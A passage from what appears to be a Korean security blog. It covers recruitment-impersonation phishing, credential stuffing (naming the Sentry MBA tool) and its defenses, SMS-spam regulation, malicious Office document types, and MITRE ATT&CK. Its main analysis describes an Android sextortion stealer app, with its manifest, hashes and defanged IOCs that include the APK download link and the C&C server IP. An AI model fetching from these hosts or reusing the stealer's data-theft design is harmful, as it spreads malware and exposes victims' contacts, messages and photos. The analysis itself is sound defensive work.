입사지원서를 핑계로 주민등록번호, 계좌번호 등 민감한 개인 정보를 요구합니다.

4) 선지급 요청

사기꾼은 구직자에게 지원서 처리, 신원 조사 수행 또는 여행 경비 준비에 대한 수수료를 지불하도록 요청할 수 있습니다. 이를 통해 아무것도 모르는 피해자들로부터 돈을 훔칩니다.

5) 가짜 교육 또는 인증 프로그램

사기꾼은 구직자에게 비용을 지불해야 하는 교육 또는 인증 프로그램에 참여할 기회를 제공할 수 있습니다. 그러나 이러한 프로그램은 존재하지 않거나 품질이 낮고 단지 돈을 추출할 목적으로 만들어진 경우가 많습니다.

6) 수표 현금화 계획

사기꾼은 구직자에게 위조 수표를 보내 수표를 입금한 후 자금의 일부를 사기꾼에게 다시 이체하도록 요청할 수 있습니다. 은행이 수표가 위조된 것을 발견했을 때 피해자는 대개 이미 사기꾼에게 돈을 보낸 상태입니다.

7) 송금 요청

사기꾼은 처리 수수료, 비자 신청, 장비 구매 등 다양한 이유로 구직자에게 송금이나 암호화폐 송금을 요청할 수 있습니다. 일단 돈을 보내면 일반적으로 회수가 불가능합니다.

8) 악성 파일 첨부

사기꾼은 암호화폐 직업에 대한 지원자의 관심을 이용하여 채용 이메일에 악성 파일을 첨부할 수 있습니다. 이러한 첨부 파일이 열리면 피해자가 모르는 사이에 악성 코드가 피해자의 컴퓨터에 다운로드되고 암호화폐가 도난당할 수 있습니다.

예방법

1) 공식 채널 확인

스타벅스의 공식 홈페이지나 채용 공고 사이트를 통해서만 채용 정보를 확인하세요.

2) URL 확인

의심스러운 링크를 클릭하기 전에 URL을 주의 깊게 확인하세요. 공식 URL과 다른 부분이 있다면 피싱 사이트일 가능성이 높습니다.

3) 개인정보 요구 주의

채용 절차에서 과도한 개인 정보를 요구하는 경우 의심해 보세요. 일반적인 채용 과정에서는 민감한 정보를 먼저 요구하지 않습니다.

4) 의심스러운 메시지 무시

의심스러운 문자 메시지나 이메일, 카카오톡 채팅은 무시하고 삭제하세요. 링크를 클릭하지 않도록 주의하세요.

4. 대응 방법

1) 의심스러운 메시지 신고

의심스러운 메시지를 받았을 경우, 해당 내용을 캡처하여 스타벅스 고객센터나 관계 당국에 신고하세요.
- 한국인터넷진흥원 대국민서비스(118 사이버도우미): 국번 없이 118
- 홈페이지: 한국인터넷진흥원 118

2) 보안 프로그램 사용 및 업데이트

최신 보안 프로그램을 설치하고 정기적으로 업데이트하여 악성 코드로부터 보호하세요.
주기적으로 업데이트하기

3) 정기적인 비밀번호 변경

중요한 계정의 비밀번호를 정기적으로 변경하고, 동일한 비밀번호를 여러 사이트에 사용하지 마세요.

채용 사칭 사기는 점점 정교해지고 있습니다. 여러분은 항상 신중하게 정보를 확인하고, 사기 수법에 속지 않도록 주의하시면 좋겠습니다.

피싱 사이트 접속 화면

해당 피싱 사이트를 접속하게 되면 이름, 전화번호, 나이를 받아서 카카오톡을 통해서 채용 빌미로 지원자에 추가적인 인적사항을 받아 개인정보, 계좌번호·송금 등을 요구하여 사기 치는 등의 추가적인 행위가 이루어질 것으로 예상됩니다.

개인정보 유출

개인정보 유출2

피싱으로 본 이유: 스타벅스코리아에 있는 실제 입사 지원 바리스타 FAST TRACK 공개 채용은 신세계 백화점 홈페이지에서 지원하는데 반해 해당 사이트는 직접적으로 당당자가 연락을 취하는 방식부터가 이미 잘못되었고, 채용 관련 홈페이지를 실제 스타벅스에서 관리하거나 어떤 대행사에 맡겨 진행될 텐데 해당 피싱 도메인 관련 정보로는 유사성을 찾을 수 없었다.

크리덴셜 스터핑(Credential Stuffing) 공격

카고형 — Sun, 30 Jun 2024 00:34:42 +0900

크리덴셜 스터핑(Credential Stuffing)

개요

크리덴셜 스터핑(Credential Stuffing)은 해커가 유출된 사용자명-비밀번호 조합을 사용하여 여러 웹사이트에 로그인 시도를 자동화하는 공격입니다. 이는 사용자들이 여러 플랫폼에서 동일한 비밀번호를 사용하는 습관을 악용합니다.

공격 방법

데이터 수집: 유출된 사용자 정보는 보통 대규모 데이터 유출 사고를 통해 얻습니다. 이러한 정보에는 사용자명, 비밀번호, 이메일 주소 등이 포함됩니다. 해당 개인정보를 해커는 다크 웹에서 이러한 데이터를 구매하거나 무료로 배포된 정보를 수집합니다.

피싱 공격: 사용자를 속여 민감한 정보를 입력하게 만드는 공격.
악성 소프트웨어: 키로거, 트로이 목마 등을 통해 정보를 수집.
소셜 엔지니어링: 신뢰를 구축하여 정보를 빼내는 방법.
취약한 웹사이트:보안이 취약한 사이트를 해킹하여 정보 탈취.

자동화 도구: Sentry MBA와 같은 도구를 사용하여 로그인 시도를 자동화합니다.

성공률: 작은 성공률로도 많은 계정을 탈취할 수 있습니다.

피해 영향

금전적 손실: 크리덴셜 스터핑 공격은 종종 금융 계정을 표적으로 하여 불법적인 금융 거래를 발생시킵니다. 이는 개인의 재산 피해뿐만 아니라 기업의 금융 손실로 이어질 수 있습니다. 예를 들어, 공격자는 피해자의 은행 계좌에 접근하여 돈을 이체하거나 온라인 쇼핑 계정을 통해 물건을 구매할 수 있습니다.

평판 손상: 기업이 크리덴셜 스터핑 공격을 당하면 고객의 신뢰도가 크게 저하됩니다. 고객의 계정이 침해되어 민감한 정보가 유출되면 고객은 해당 기업을 신뢰하지 않게 되며, 이는 장기적으로 기업의 브랜드 이미지에 심각한 손상을 줄 수 있습니다. 예를 들어, 대형 소매업체가 공격을 받아 고객 정보가 유출되면 고객은 해당 소매업체를 이용하지 않게 될 수 있습니다.

법적 문제: 개인정보 보호법 등 다양한 규제를 준수하지 못할 경우 법적 문제에 직면할 수 있습니다. 유럽 연합의 GDPR과 같은 법률은 데이터 침해가 발생할 경우 기업에 큰 벌금을 부과할 수 있습니다. 예를 들어, GDPR 규정을 위반하여 고객의 개인정보가 유출된 기업은 막대한 금전적 벌금과 함께 법적 소송에 직면할 수 있습니다.

피해 사례

Equifax 데이터 유출 (2017): 해커들이 1억 4,700만 명 이상의 미국인의 개인 정보를 탈취. 사회보장번호, 출생일, 주소 등이 유출되어 크리덴셜 스터핑 공격에 사용됨. 결과적으로 수백만 달러의 법적 비용과 고객 신뢰도 손실이 발생.

리버티 리저브 (2013): 해커들이 대규모 금융 플랫폼의 사용자 계정 정보를 탈취하여 불법 금융 거래와 돈세탁에 사용. 이로 인해 회사가 폐쇄되고 관련자가 체포됨.

소니 픽처스 엔터테인먼트 (2014): 해커들이 직원 계정 정보와 기밀 데이터를 탈취하여 영화 미개봉본을 유출하고 내부 이메일을 공개, 막대한 평판 손실을 초래함. 법적 문제와 수백만 달러의 비용이 발생.

방어 전략

다중 인증(MFA): 추가적인 보안 레이어로 계정을 보호합니다. MFA는 사용자가 로그인할 때 추가적인 인증 단계를 거치도록 하여 비밀번호가 유출되더라도 계정을 보호할 수 있습니다. 예를 들어, 사용자가 로그인 시 SMS로 전송된 일회용 코드를 입력하도록 요구할 수 있습니다.

비밀번호 관리: 강력하고 고유한 비밀번호 사용을 권장합니다. 사용자는 각기 다른 계정에 대해 서로 다른 비밀번호를 사용해야 하며, 비밀번호는 복잡하고 추측하기 어렵게 만들어야 합니다. 예를 들어, 최소 12자 이상의 대문자, 소문자, 숫자, 특수문자가 조합된 비밀번호를 사용하는 것이 좋습니다. 추가적으로, 2단계 인증을 활성화하여 보안을 강화할 수 있습니다.

2단계 인증 하는법

삼성 계정: 휴대폰 설정 > 계정 > 삼성 계정 > 비밀번호 및 보안 > 2단계 인증 메뉴 활성화
Apple ID: 휴대폰 설정 > 사용자 이름 > 암호 및 보안 > 이중 인증 켜기 > 계속
네이버 계정: 로그인 > 내정보 > 보안설정 > 비밀번호 (2단계 인증) > 설정
다음카카오 계정: 로그인 > 내정보 > 2단계 인증 > 설정
구글 계정: 로그인 > Google 계정 관리 > 보안 > 2단계 인증 > 설정

모니터링: 비정상 로그인 활동을 실시간으로 감시하고 대응합니다. 자동화된 도구를 사용하여 로그인 시도의 패턴을 분석하고, 비정상적인 로그인 시도가 감지되면 즉시 경고를 발송하거나 추가 인증 단계를 요구할 수 있습니다. 예를 들어, 동일한 IP 주소에서 짧은 시간 내에 여러 계정으로 로그인 시도가 발생하면 해당 IP를 차단하는 조치를 취할 수 있습니다.

탐지 방법

1. 로그인 시도 모니터링: 짧은 시간 내에 동일한 IP 주소 또는 여러 IP 주소에서 다수의 로그인 시도가 발생하는지 모니터링합니다. 이러한 활동은 크리덴셜 스터핑의 전형적인 징후입니다.

2. 비정상적인 로그인 패턴 분석: 사용자 계정의 평소 로그인 패턴과 비교하여 비정상적인 활동을 탐지합니다. 예를 들어, 일반적으로 특정 지역에서만 로그인하는 사용자가 갑자기 다른 국가에서 로그인 시도가 발생하는 경우.

3. 계정 잠금 정책 적용: 일정 횟수 이상의 실패한 로그인 시도가 발생하면 계정을 잠금 처리하여 추가적인 공격을 방지합니다.

4. 캡차 도입: 자동화된 로그인 시도를 차단하기 위해 로그인 페이지에 캡차를 도입합니다.

5. 실시간 경고 시스템: 비정상적인 로그인 활동이 감지되면 실시간으로 경고를 발송하여 즉각적인 대응이 가능하도록 합니다.

6. IP 평판 분석: 알려진 악성 IP 주소 또는 의심스러운 IP 주소로부터의 접근을 차단하거나 제한합니다

[악성 앱] 원클라우드 악성앱 분석 (24.06.19)

카고형 — Thu, 27 Jun 2024 00:20:22 +0900

몸캠 피싱 관련 정리를 하고 싶어서 정보를 찾다가 몸캠피싱 피해자 모임이라는 사이트에서 cloud1one이라는 도메인을 가지는 피싱 사이트를 발견했습니다.

몸캠피싱

피해과정

채팅 앱 및 SNS -> 친밀감 형성 -> 피해자 욕구 충족(기프티콘, 금전, 성욕 등) -> 영상 및 사진 요구 -> 지인 연락처 확보(악성 앱 설치) -> 협박 및 금전요구

몸캠피싱 피해자 모임 게시물

소개팅 어플에서 만난 사람이 타 sns로 이동 요구를 한 후에 링크를 보내 악성 앱 다운 유도를 하는 상황으로 보입니다. 해당 내용으로는 주소를 정확히 알 수없기 때문에 구글 검색 도구를 이용하여 찾아봤습니다. 확인결과 유효해 보이는 1개의 사이트를 찾을 수 있었습니다.

구글 검색 결과

피싱 사이트 접속 화면

해당 피싱 사이트는 디버그 방지와 [app store] , [google play] 버튼을 눌렀을 때 특정 버전 이상의 값을 가져야 다음 페이지(악성앱 설치 페이지)로 이동할 수 있는 것으로 확인되었습니다. userAgent 정보를 확인해 버전이 안 나올 경우 모바일 환경으로 유도하기 위해 qr코드가 보이는 페이지를 보여 줍니다.

피싱 사이트 접속 화면

모바일 환경 유도 페이지

버전확인

ios 버전 확인

android 버전 확인

악성 앱 리소스 분석

리소스 확인 시 Activities 8 , Services 3, Receivers 0, Providers 4의 컴포넌트를 사용하고, 권한은 10개을 사용함 각 권한은 인터넷, 연락처, 휴대폰정보, 미디어파일, 문자를 유출할 수 있는 권한이 존재하는 것을 확인할 수 있다.

APK 파일 정보

App Name: 원클라우드
Version Code: 6
Version Name: 1.6.1
Package Name : com.example.mydemo

MD5: 0ccee71c733015b8830d56c4ccfbe355
SHA-1: 8c8da672abd1ff52dfed393275174a2a57f831eb
SHA-256: 1d4c2f1d1fdf2ea108a6239283021a4a5d7a99c30d61ba497c91530b84aa3966

VirusTotal 백신 탐지 결과

19개의 백신에서 악성으로 탐지된다.

Security Solution	탐지정보
AhnLab-V3	Trojan/Android.Infostealer.1227129
Antiy-AVL	Trojan/Generic.ASMalwAD.EA2
Avast-Mobile	Android[Trj]
Avira (no cloud)	ANDROID/AVE.Evo.brwkd
BitDefenderFalx	Android.Riskware.TestKey.rA
Cynet	Malicious (score: 99)
DrWeb	Android.Siggen.Susp.11505
ESET-NOD32	A Variant Of Android/Spy.Agent.DIL
Fortinet	Android/Agent.DIL!tr.spy
Google	Detected
Ikarus	Trojan-Spy.AndroidOS.Agent
K7GW	Spyware ( 005b614c1 )
Kaspersky	HEUR.AndroidOS.FakeApp.by
Microsoft	Spyware/Multiverze
Sophos	Android Xgen PUA (PUA)
Symantec Mobile Insight	AdLibrary
Trustlook	Android.PUA.DebugKey
WithSecure	Malware.ANDROID/AVE.Evo.brwkd
ZoneAlarm by Check Point	HEUR.AndroidOS.FakeApp.by

Android Manifest

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="6" android:versionName="1.6.1" android:compileSdkVersion="32" android:compileSdkVersionCodename="12" package="com.example.mydemo" platformBuildVersionCode="32" platformBuildVersionName="12">
    <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="32"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
    <uses-permission android:name="android.permission.READ_MEDIA_AUDIO"/>
    <uses-permission android:name="android.permission.READ_MEDIA_VIDEO"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:theme="@style/Theme.Mydemo" android:label="@string/app_name" android:icon="@mipmap/applogosho" android:name="com.example.mydemo.BaseApp" android:allowBackup="true" android:supportsRtl="true" android:fullBackupContent="@xml/backup_rules" android:networkSecurityConfig="@xml/network_security_config" android:appComponentFactory="androidx.core.app.CoreComponentFactory">
        <activity android:name="com.example.mydemo.LoginActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.example.mydemo.MainActivity"/>
        <activity android:name="com.example.mydemo.ContactActivity"/>
        <activity android:name="com.example.mydemo.AlbumActivity"/>
        <activity android:name="com.example.mydemo.UploadActivity"/>
        <service android:name="com.example.mydemo.servise.UploadService" android:exported="true">
            <intent-filter android:priority="1000">
                <action android:name="com.example.mydemo.UploadService"/>
            </intent-filter>
        </service>
        <provider android:name="com.luck.picture.lib.basic.PictureFileProvider" android:exported="false" android:authorities="com.example.mydemo.luckProvider" android:grantUriPermissions="true">
            <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/ps_file_paths"/>
        </provider>
        <service android:name="com.luck.picture.lib.service.ForegroundService" android:enabled="true" android:foregroundServiceType="location"/>
        <activity android:theme="@style/Base.Theme.NoActionBar" android:name="com.luck.picture.lib.basic.PictureSelectorSupporterActivity" android:configChanges="screenSize|orientation|keyboardHidden"/>
        <activity android:theme="@style/Picture.Theme.Translucent" android:name="com.luck.picture.lib.basic.PictureSelectorTransparentActivity" android:configChanges="screenSize|orientation|keyboardHidden"/>
        <meta-data android:name="huawei_module_scankit_local" android:value="1030100"/>
        <meta-data android:name="huawei_module_scankit_sdk_version" android:value="scan:1.1.3.301"/>
        <meta-data android:name="com.huawei.hms.client.service.name:scan" android:value="scan:1.1.3.301"/>
        <meta-data android:name="com.huawei.hms.min_api_level:scan:huawei_module_scankit" android:value="1"/>
        <meta-data android:name="com.huawei.hms.min_api_level:scan:hmscore" android:value="1"/>
        <activity android:name="com.huawei.hms.hmsscankit.ScanKitActivity" android:screenOrientation="portrait"/>
        <provider android:name="androidx.startup.InitializationProvider" android:exported="false" android:authorities="com.example.mydemo.androidx-startup">
            <meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup"/>
        </provider>
        <meta-data android:name="com.huawei.hms.client.service.name:ml-computer-camera-inner" android:value="ml-computer-camera-inner:1.0.3.340"/>
        <meta-data android:name="com.huawei.hms.client.service.name:ml-computer-ha-inner" android:value="ml-computer-ha-inner:1.0.3.340"/>
        <meta-data android:name="com.huawei.hms.client.service.name:dynamic-api" android:value="dynamic-api:1.0.13.303"/>
        <meta-data android:name="com.huawei.hms.min_api_level:dynamic-api:huawei_module_dynamicloader" android:value="2"/>
        <provider android:name="com.huawei.agconnect.core.provider.AGConnectInitializeProvider" android:exported="false" android:authorities="com.example.mydemo.AGCInitializeProvider"/>
        <service android:name="com.huawei.agconnect.core.ServiceDiscovery" android:exported="false"/>
        <meta-data android:name="com.huawei.hms.client.service.name:ml-computer-vision-base" android:value="ml-computer-vision-base:1.0.0.301"/>
        <provider android:name="com.huawei.hms.mlsdk.common.Provider.MLInitializerProvider" android:exported="false" android:authorities="com.example.mydemo.MLInitializerProvider"/>
    </application>
</manifest>

Android Permission

권한	설명	위험성
android.permission.INTERNET	애플리케이션이 인터넷에 액세스할 수 있도록 허용합니다.	낮음 - 인터넷 연결 자체는 위험하지 않지만, 다른 민감한 데이터와 결합될 경우 데이터 유출의 가능성이 있습니다.
android.permission.READ_CONTACTS	사용자의 연락처 데이터를 읽을 수 있습니다.	높음 - 개인적인 연락처 정보가 외부로 유출될 수 있으며, 피싱 및 스팸에 악용될 수 있습니다.
android.permission.READ_PHONE_STATE	전화 상태(전화번호, 네트워크 정보 등)를 읽을 수 있습니다.	중간 - 사용자의 전화번호와 네트워크 상태 정보가 유출될 수 있으며, 프라이버시 침해가 발생할 수 있습니다.
android.permission.READ_PHONE_NUMBERS	사용자의 전화번호를 읽을 수 있습니다.	중간 - 사용자의 전화번호가 외부로 유출될 수 있으며, 이를 통해 사용자를 식별하거나 스팸에 사용될 수 있습니다.
android.permission.READ_EXTERNAL_STORAGE	외부 저장소에 저장된 파일을 읽을 수 있습니다.	높음 - 사용자의 사진, 문서 등 개인 파일이 유출될 수 있으며, 중요한 데이터가 노출될 위험이 있습니다.
android.permission.READ_MEDIA_IMAGES	사용자의 이미지 파일에 액세스할 수 있습니다.	중간 - 개인 사진이나 스크린샷 등의 이미지 파일이 유출될 수 있습니다.
android.permission.READ_MEDIA_AUDIO	사용자의 오디오 파일에 액세스할 수 있습니다.	중간 - 사용자의 음성 녹음 파일이나 음악 파일 등이 유출될 수 있습니다.
android.permission.READ_MEDIA_VIDEO	사용자의 비디오 파일에 액세스할 수 있습니다.	중간 - 개인 비디오 파일이 유출될 수 있습니다.
android.permission.READ_SMS	사용자의 SMS 메시지를 읽을 수 있습니다.	높음 - 개인적인 메시지 내용이 유출될 수 있으며, 이를 통해 피싱, 스팸, 사기 등이 발생할 수 있습니다.
android.permission.ACCESS_NETWORK_STATE	네트워크 연결 상태(예: Wi-Fi, 모바일 네트워크)를 읽을 수 있습니다.	낮음 - 네트워크 상태 정보 자체는 큰 위험이 없지만, 다른 데이터와 결합될 경우 위험이 증가할 수 있습니다.

Activities 8 , Services 3, Receivers 0, Providers 4와 15개의 권한을 사용하는 것을 알 수 있습니다.

코드 분석

처음 앱 실행 시 인증 코드를 입력하는 화면이 보인다. 몸캠피싱 공격자가 주는 인증번호를 받아 입력하면 C&C 서버와 통신하여 검증 절차를 거치고 성공하게 되면 다음 행위로 넘어가는것으로 확인되며, 인증에 성공 하게 되면 권한설정 요구하고 권한 체크가 되면 정보 유출을 시작한다. 유출 정보는 sms, 주소록, 갤러리 정보와 기기 정보가 유출된다. 피해자에게 협박하기 위해 연락처와 사진, 영상, sms 정보 등을 수집하는 것으로 보인다.

1. 인증 화면

앱 실행 시 기존에 인증한 사용자인지 sharedPreferences 특정 값을 확인하여 검증 false 경우 인증 화면이 보여준다.

앱 실행 화면

앱 실행시 기존에 인증한 사용자인지 체크

2. 인증 코드 검증

초대 코드를 입력하여 C&C 서버와 통신해 인증 코드 검증 성공시 업로드 화면으로 이동

인증 코드 검증

인증 성공 저장

업로드 화면

3. 앱권한 요구 및 정보 유출

권한 체크가 확인되면 SMS, 주소록, 앨범, 기기정보를 유출한다.

권한 요구

권한체크시 정보유출

sms 정보 유출

주소록 정보 유출

갤러리 정보 유출

통신사 정보 수집

기기 번호 수집

4. 정보 유출

하드코딩된 C&C 서버 주소로 수집된 정보 유출

하드코딩된 정보 유출지

정보 유출 형태

정보 유출 SMS

정보 유출 주소록

IOC

피싱 페이지 : https://www[.]cloud1one[.]com/
경유 페이지 :https://pgpfs[.]pfilbmje[.]com/api/c/x5qgtwsy
악성앱 다운 페이지 : https://pgsns[.]hedkzeio[.]com/x5qgtwsy
유포지 : https://zz[.]ppa58d[.]cyou/resource/1719015307618481526.apk?sign=9b9a6220b2706a9e005714a065d9b8f5&t=1719140231
정보 유출지 :  http://104[.]233[.]167[.]116/prod-api/

MD5: 0ccee71c733015b8830d56c4ccfbe355
SHA-1: 8c8da672abd1ff52dfed393275174a2a57f831eb
SHA-256: 1d4c2f1d1fdf2ea108a6239283021a4a5d7a99c30d61ba497c91530b84aa3966

대량 문자 발송 사업자 규제를 위한 제도 '자격인증제'

카고형 — Mon, 3 Jun 2024 07:44:47 +0900

불법스팸, 스미싱등 대량 문자 서비스를 막기 위해 이번에 KISA에서 '자격인증제'등을 도입하는 것 같다. 6월부터 '자격 인증제'를 실시하게 된다고 한다. 또한 다른 제도를 통해 스팸, 스미싱등 억제를 하겠다는 거 같다.

국내 발신 같은 경우는 정부와 기업등 협의를 해서 차단이나, 규제등의 조치로 억제할 수 있을 것으로 생각된다. 해외에서 발신한 경우는 아직까진 각 부처별 협의와 국제 공조가 필하다고 한다.

참고 기사 : https://www.boannews.com/media/view.asp?idx=130219

민폐 스미싱 그만! 대량문자 발송 사업자 규제 위한 ‘자격인증제’ 6월부터 시행

최근 본지가 보도한 개인정보위원회를 사칭한 스미싱 문자부터 행정안전부, 국세청 등 공공기관, 택배, 부고 등 각종 스팸문자가 난무하고 있다. 이러한 극성스러운 스팸 및 스미싱 문자에 정부

www.boannews.com

주요 내용

대량문자 발송서비스 사업자 '자격인증제'
발송 억제를 위한 발신 번호 블랙리스트 기반 문자스팸 재발송 제한
산성전자 휴대폰의 'on-divece' 악성문자 필터링 서비스 (2024년 하반기부터 시행 예정)

자격인증제

문자 중개사가 일정 요건을 갖춘 재판매 사업자에게 대량문자 전송자격을 부여하는 업계 자율규제 제도

"인증제는 KCUP(방송통신 이용자 보호 협회) 이 운영하며 문자재판매사 1,175개사 등을 대상으로 자격인증 심사, 현장점검 등을 통해 인증 제도를 운영함으로써 스팸 발송에 대한 규제를 강화할 것" 또한 모니터링을 통해 자격정지등 규제를 한다고 한다.

블랙리스트 기반 문자스팸 재발송 제한

“다수, 중복·신고된 문자 스팸의 발신번호를 문자중개사에 공유하고, 문자중개사는 블랙리스트에 등록된 번호로부터 발송되는 모든 문자를 차단해야 한다”

“시스템 테스트 및 시범 운영결과, 블랙리스트는 3개월간 문자 발송을 제한·정지하도록 운영하고 있으며, 누적 74,000여 개 번호를 블랙리스트로 등록함으로써 총 414만 건 문자스팸 발송을 억제(2023년 8월~2024년 4월 시범운영)했다”

'on-divece' 악성문자 필터링 서비스

스팸신고 분석 데이터를 기반으로, 삼성전자 휴대폰에서 악성문자를 한 번 더 필터링할 수 있는 기능을 추가한 것이다.

마무리

인증제를 통한 규제와 블랙리스트 기반 제한으로 지금까지 쫌 수월하게? 보낼 수 있었던 것에 비해 어려워지지 않을까 생각이 든다. 스미싱 공격 방식 또한 기존 형태에서 많이 바뀌지 않을까? 이번 내용은 대량 문자를 규제 함으로써 무분별하게 스팸, 스미싱 문자가 오던 게 많이 줄지 않을까 한다. 단순히 문자에서 악성앱 다운, 피싱 사이트로 바로 이동하는 방식으로는 탐지되어 더 이상 보내는 게 어려워질 테니 보이스 피싱이나, 로맨스 스캠, 몸캠 피싱처럼 개인화 공격에 초점이 맞춰지지 않을까 생각 든다.

그래도 문자와 비슷한 형태로 공격한다고 하면??? 문자를 통한 것보다 기존에도 있었던 SNS나 가짜 쇼핑몰, 스마트스토어 등을 이용한 공격으로 바뀌지 않을까?

아래 기사를 봐도 최근까지 최저가로 유인해 피싱 사이트로 유도하여 개인정보 유출 및 결제 사기를 했었다고 한다.
https://www.psnews.co.kr/news/articleView.html?idxno=2051316

최저가로 유인해 피싱 사이트로 유도하는 사기 성행 - 퍼블릭뉴스

온라인 쇼핑몰에서 최저가로 소비자를 유인한 뒤 피싱사이트로 유도하는 범행이 잇따라 발생하고 있다. 지난 1일 MBC뉴스에 따르면 피해자 A씨는 네이버 스마트스토어에서 상대적으로 저렴한 제

www.psnews.co.kr

스마트 스토어를 통해 쉽게 가짜 사이트를 등록하고 이용자에게 쉽게 연락이 가능하다고 하면 이를 이용한 개인화 공격 형태로 바뀌지 않을까라는 생각이 든다. 최근에는 사람들이 스미싱 문자에 대해서는 많이 알고, 방송 매체나 많이 다루지만 스마트 스토어를 이용한 결제 사기는 모르는 사람들이 생각보다 많은 거 같다. 결제 사기 시나리오 경우에도 통장에 입금을 요구하는데 그 대신 택배 오류, 관세 관련등 이유로 악성 앱을 다운로드 유도나 피싱 사이트 유도 할 수도 있다고 생각됩니다.

[문서 파일] 악성 MS Office 일반적인 유형

카고형 — Sat, 16 Mar 2024 16:52:01 +0900

Office 제품군의 광범위한 사용을 악용하여 맬웨어를 전달하거나 무단 작업을 실행합니다. 이러한 문서는 시스템이나 데이터를 손상시키는 데 사용하는 기술에 따라 분류될 수 있습니다. 일반적인 유형은 다음과 같습니다.

1. 매크로 사용 문서

이러한 문서에는 문서를 열 때 다양한 작업을 수행할 수 있는 VBA(Visual Basic for Application)로 작성된 작은 프로그램인 매크로(Macro)가 포함되어 있습니다. 공격자는 일단 활성화되면 맬웨어를 다운로드하거나 백도어를 생성하거나 기타 악의적인 활동을 수행할 수 있는 악성 매크로를 내장합니다. 이러한 파일은 일반적으로 매크로 기능을 나타내는 .docm, .xlsm 또는 .pptm과 같은 확장자를 갖습니다.

2. 문서 악용(Exploit)

악용 문서는 Microsoft Office 제품군 내의 취약점을 이용하여 문서를 여는 것 이상의 사용자 상호 작용 없이 악성 코드를 실행합니다. 이러한 익스플로잇은 소프트웨어의 특정 결함을 표적으로 삼아 기존의 보안 조치를 우회하여 시스템을 손상시킵니다. 문서 자체는 무해해 보일 수 있지만 취약한 응용 프로그램에서 처리할 때 취약점 악용을 트리거하도록 제작되었습니다.

3. DDE(Dynamic Data Exchange)/DDEAUTO 문서

DDE(동적 데이터 교환) 문서는 Office 응용 프로그램이 문서 간에 실시간으로 데이터를 전송할 수 있도록 하는 DDE 프로토콜을 활용합니다. 공격자는 이 기능을 오용하여 악성 코드나 명령을 직접 실행하는 문서를 제작합니다. 업데이트 및 보안 패치로 인해 일반적으로 사용되지는 않았지만 DDE 공격은 과거 공격에서 중요한 위협 벡터였습니다.

4. OLE 개체 문서

OLE(Object Linking and Embedding)는 문서 및 기타 개체를 포함하고 연결할 수 있는 기술입니다. 악성 문서는 OLE를 사용하여 유해한 스크립트나 실행 파일을 포함합니다. 문서가 열리고 포함된 콘텐츠가 상호 작용하면 악성 페이로드가 실행될 수 있습니다.

5. 피싱 문서

이러한 문서가 반드시 소프트웨어 취약점을 악용하거나 매크로를 사용하는 것은 아닙니다. 대신 그들은 소셜 엔지니어링을 사용하여 사용자를 속여 매크로 활성화, 로그인 자격 증명 입력, 추가 악성 파일 다운로드 및 열기 등 위험한 행동을 취하도록 합니다. 피싱 문서에는 사용자에게 보안 기능을 비활성화하거나 악성 사이트 링크를 따르도록 촉구하는 설득력 있는 메시지가 포함될 수 있습니다.

6. 외부 링크 문서

이 유형에는 외부 악성 리소스에 대한 링크가 포함된 문서가 포함됩니다. 문서 자체에는 악성 코드가 직접 포함되어 있지 않을 수 있지만 사용자를 악성 코드가 있는 외부 소스로 연결합니다. 이 방법은 피싱 기술과 함께 사용되어 사용자가 악성 코드를 다운로드하거나 민감한 정보를 제공하도록 유인할 수 있습니다.
문서 내에 있는 "*.xml.rels" 파일을 조사하면 참조하는 내/외부링크 확인 가능

징후 식별 방법 및 악성행위 판단

OLEdump등을 이용하여 파일 포멧상 레이아웃 분석하여 [VB, 자바, 포스트]스크립트 파일, DDE, 매크로등 존재여부 확인
파일 포멧상 비정상 스트림 또는 속성 값 존재 확인
파일 내부에 있는 악성 개체(매크로, 스크립트 등)을 추출하여 악성 행위 있는지 확인
DDE/DDEAUTO 명령어 확인
- 동일 스트림이 같은 사이즈로 여러개 있는지 확인
- 스트림 안에 PE파일 시그니처 확인
- Bindata 스토리지에 OLE 존재 확인
- [.ps .eps .vba .js 등] 스크립트 확인

사용 Tool

OLEDUMP

xls 파일 포멧 : https://www.loc.gov/preservation/digital/formats/digformatspecs/Excel97-2007BinaryFileFormat%28xls%29Specification.pdf

MITRE ATT&CK 정리

카고형 — Tue, 6 Feb 2024 19:15:47 +0900

https://attack.mitre.org/

MITRE ATT&CK®

MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private se

attack.mitre.org

빠르게 변화하는 악성코드를 대응하기 위해 기존 탐지 방법에서 추가로 행위 기반 탐지를 하여 공격자 행위(전략, 전술)가 중요해지는 중이다. 보안 회사에서 DWELL TIME(공격자가 내부망에 침투 후 실제 발견되는 시간)을 줄이려는 게 목표인데 차단도 중요 하지만 탐지시간을 줄여 빠르게 대응(방어) 하는 추세로 변화 중인 거 같다. 그래서 공격자의 행위나 해커그룹에 공격 방식등을 확인하고 어떻게 탐지하는지 까지 정보가 모아져 있는 마이트 어택이 뜨고 있는 이유인 거 같다.

MITRE

1958년에 설립된 미국의 비영리 민간 연구 기관

미궁의 정부 기관과 협력하여 국방,보안,헬스케어 등의 분야에서 전문적인 연구를 수행 (CVE, CWE, CAPEC, STIX, TAXII, Cybox, MAEC[악성코드], ATT&CK, DEFEND)

기존 탐지 방안에서 행위기반 탐지로 바뀌는 중 많이 사용

ATT&CK (Adversarial Tactics Techniques & Common Knowledge)

